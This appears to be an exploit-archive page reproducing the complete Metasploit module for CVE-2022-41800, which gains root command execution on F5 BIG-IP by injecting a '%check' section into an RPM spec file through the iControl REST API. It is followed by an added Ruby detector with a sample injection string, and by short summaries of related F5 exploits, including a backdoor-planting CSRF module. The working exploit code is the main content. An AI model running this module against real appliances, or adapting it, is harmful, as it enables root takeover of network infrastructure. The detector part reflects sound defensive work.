Headline
F5 BIG-IP iControl Remote Command Execution
This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',
        'Description' => %q{
          This module exploits a newline injection into an RPM .rpmspec file that permits
          authenticated users to remotely execute commands. Successful exploitation results
          in remote code execution as the root user.
        },
        'Author' => [
          'Ron Bowes' # Discovery, PoC, and module
        ],
        'References' => [
          ['CVE', '2022-41800'],
          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
          ['URL', 'https://support.f5.com/csp/article/K97843387'],
          ['URL', 'https://support.f5.com/csp/article/K13325942'],
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2022-11-16', # Vendor advisory
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Privileged' => true,
        'Targets' => [
          [ 'Default', {} ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION], # One at a time
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )

    register_options(
      [
        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
        OptString.new('HttpPassword', [true, 'iControl password', ''])
      ]
    )
  end

  def exploit
    # The RPM name is based on these, so we need these to delete the RPM file after
    name = rand_text_alphanumeric(5..10)
    version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"
    release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"

    vprint_status('Creating an .rpmspec file on the target...')
    result = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),
      'ctype' => 'application/json',
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
      'data' => {
        'specFileData' => {
          'name' => name,
          'srcBasePath' => '/tmp',
          'version' => version,
          'release' => release,
          # This is the injection - add newlines then a '%check' section
          'description' => "\n\n%check\n#{payload.encoded}\n",
          'summary' => rand_text_alphanumeric(5..10)
        }
      }.to_json
    })

    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result
    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401
    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200

    json = result&.get_json_document
    fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json

    file_path = json['specFilePath']
    fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path

    vprint_status("Created spec file: #{file_path}")
    register_file_for_cleanup(file_path)

    # We can also use `exit 1` in the %check function to prevent this file
    # from being created, rather than cleaning it up.. but that seems noisier?
    # Neither option gets logged so /shrug
    register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")

    vprint_status('Building the RPM to trigger the payload...')
    result = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),
      'ctype' => 'application/json',
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
      'data' => {
        'state' => {},
        'appName' => rand_text_alphanumeric(5..10),
        'packageDirectory' => '/tmp',
        'specFilePath' => file_path
      }.to_json
    })

    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result
    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401
    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299
  end
end
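The module above works because the rpm-spec-creator endpoint copies the JSON `description` field verbatim into the .rpmspec file, so a value carrying a newline followed by a `%check` section becomes a section rpmbuild executes. As an added defender-side example (not part of the Metasploit module or of F5's code), the following Ruby shows the input check a fixed server would apply to spec fields and the same check run over a captured request body to that endpoint; the endpoint path comes from the module, and the sample bodies are constructed.

```ruby
# Added example (not from the Metasploit module or F5): detects the primitive the
# module relies on. The rpm-spec-creator endpoint copies JSON fields such as
# 'description' verbatim into an .rpmspec file, so a value carrying
# "\n%check\n<cmd>" opens a new section that rpmbuild later executes as root.
require 'json'

# RPM section directives; none may start a line inside a single-line field.
RPM_SECTION_RE = /^\s*%(?:prep|build|install|check|clean|pre|post|preun|postun|files|changelog)\b/

# True when the value would break out of the spec line it is written into.
def spec_field_injected?(value)
  return false unless value.is_a?(String)
  return true if value.match?(/[\r\n]/) # any line break ends the current tag
  RPM_SECTION_RE.match?(value)
end

# Server-side fix shape: reject rather than strip, so probing encodings fails loudly.
def sanitize_spec_field(value)
  raise ArgumentError, 'newline or RPM section directive in spec field' if spec_field_injected?(value)
  value
end

# Log/WAF review: return the offending specFileData field names for a captured
# POST body to the rpm-spec-creator endpoint (empty array when benign).
def flag_request(uri, body)
  return [] unless uri.end_with?('/mgmt/shared/iapp/rpm-spec-creator')
  parsed = JSON.parse(body)
  data = parsed.is_a?(Hash) ? parsed['specFileData'] : nil
  return [] unless data.is_a?(Hash)
  data.select { |_field, value| spec_field_injected?(value) }.keys
rescue JSON::ParserError
  []
end

# Constructed sample bodies (not captured traffic).
BENIGN_BODY = { specFileData: { name: 'demo', srcBasePath: '/tmp', version: '1.0.0',
                                release: '1', description: 'demo package', summary: 'demo' } }.to_json
INJECTED_BODY = { specFileData: { name: 'demo', srcBasePath: '/tmp', version: '1.0.0',
                                  release: '1', description: "\n\n%check\necho injected\n",
                                  summary: 'demo' } }.to_json

if __FILE__ == $PROGRAM_NAME
  p flag_request('/mgmt/shared/iapp/rpm-spec-creator', BENIGN_BODY)   # => []
  p flag_request('/mgmt/shared/iapp/rpm-spec-creator', INJECTED_BODY) # => ["description"]
end
```

The same field check applied to every key of `specFileData`, not only `description`, matters because any field the server writes into the spec as a line is an equivalent injection point.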
Related news
This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.
In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes the next time a user logs in interactively. This overwrites a file, but we restore it when we get a session. Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.
Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, could completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to gain remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -
Widespread exploitation deemed ‘unlikely’ given hurdles